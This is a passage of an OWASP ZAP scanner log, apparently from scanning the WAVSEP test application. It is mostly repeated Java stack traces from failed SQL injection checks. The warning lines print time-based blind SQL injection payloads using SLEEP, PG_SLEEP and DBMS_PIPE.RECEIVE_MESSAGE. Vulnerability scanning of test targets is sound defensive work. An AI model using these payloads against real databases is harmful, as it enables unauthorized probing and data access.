DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(118)||CHR(69)||CHR(105),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682114 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';(SELECT * FROM (SELECT(SLEEP(5)))Dcxg)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%';(SELECT * FROM (SELECT(SLEEP(5)))Dcxg)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682114 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(112)||CHR(107)||CHR(81),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(112)||CHR(107)||CHR(81),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682115 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;(SELECT * FROM (SELECT(SLEEP(5)))aFrh)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;(SELECT * FROM (SELECT(SLEEP(5)))aFrh)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682115 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))ygdf) AND (7109=7109] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))ygdf) AND (7109=7109 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682116 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682116 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))QJBU)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))QJBU) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682117 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682118 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))fNCe) AND ('SvmR'='SvmR] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))fNCe) AND ('SvmR'='SvmR at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682118 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682119 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))NzKC) AND 'vHda'='vHda] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))NzKC) AND 'vHda'='vHda at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682120 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))Fddq) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))Fddq) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682121 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682121 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))BzMN)-- AtZf] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))BzMN)-- AtZf at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682122 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at 